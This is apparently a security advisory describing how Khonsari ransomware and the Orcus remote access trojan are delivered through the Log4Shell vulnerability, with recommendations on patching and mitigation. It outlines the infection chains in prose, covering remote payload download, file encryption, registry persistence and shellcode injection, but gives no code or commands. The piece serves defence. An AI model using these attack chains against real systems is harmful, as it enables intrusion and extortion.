A new type of ransomware and a Remote Access Trojan (RAT) have been discovered being installed via the log4j vulnerability, also known as “Log4Shell.” Log4Shell, tracked as CVE-2021-44228, is a vulnerability within the log4j module, which is used extensively for logging purposes in Java-based applications. The vulnerability allows an attacker to remotely send a specially crafted payload that, when logged by the receiving server, triggers a lookup function to be invoked and executes a file from a remote location. This allows an attacker to execute arbitrary code on the targeted server.
The new ransomware, called Khonsari, targets vulnerable Java applications running on Windows operating systems. The ransomware uses the Log4Shell vulnerability to force the victim system to download an additional payload, which is the main ransomware payload of Khonsari. This malicious .NET binary then executes and encrypts all drives on the device, as well as all user’s personal directories, such as their Desktop or Downloads folders. The ransomware uses an AES 128 CBC algorithm to perform the encrypting, and adds the extension “.khonsari” to each file. As typical with ransomware, a ransom note is then created that informs the user to send the threat actor Bitcoin in order to get their files decrypted.
Researchers have also seen a RAT being installed via the Log4Shell vulnerability. This RAT, called Orcus, follows a similar pattern of infection as the Khonsari ransomware; the Log4Shell vulnerability is used to force the victim to download and execute a secondary payload, which is the main Orcus malware dropper. From there, the Orcus malware establishes persistence via the Run registry key and then downloads shellcode from an external site and injects it into the conhost.exe process. The payload then starts beaconing to its command-and-control server, completing the infection.
The relative ease of exploitation of Log4Shell makes it a prime target of attack for threat actors, so it is likely that there will be more types of malware being deployed using this vulnerability.
Due to the ease of exploitation and the widespread use of the log4j module, Log4Shell is an extremely severe vulnerability. It is recommended for organizations to determine the applications that are impacted, especially any externally facing ones, and patch them as soon as possible. This task can be difficult, however, as some applications may have nested dependencies that utilize the vulnerable log4j modules, making it difficult to determine what is all impacted. For any applications that cannot be patched immediately, it is recommended to set the “formatMsgNoLookups” flag within log4j to true, as this helps mitigate the attack. As with all ransomware and other forms of malware, it is important to maintain up-to-date security controls on endpoints and routinely perform backups of systems in case they need to be recovered. The number and types of malware that are seen being executed via this attack will only continue to increase, so reducing the attack surface and hardening systems will be key to prevent a major incident from occurring at any organization.